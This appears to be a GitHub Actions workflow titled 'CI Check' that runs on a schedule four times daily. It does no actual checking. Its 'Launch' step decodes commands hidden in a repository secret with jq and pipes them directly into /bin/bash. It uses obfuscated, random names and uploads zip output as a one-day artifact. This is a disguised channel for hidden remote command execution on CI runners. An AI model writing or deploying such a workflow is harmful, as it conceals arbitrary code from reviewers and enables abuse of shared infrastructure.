name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '32 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          pj33: ${{ secrets.pj33 }}
        run: |
          printf '%s' "$pj33" | jq -r .qqcu724 | /bin/bash
          printf '%s' "$fgc29491" | jq -r .qku9442 | /bin/bash
          echo $roclu301 | jq -r .jdi1 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: SzrbIA3A
          path: "*.zip"
          retention-days: 1
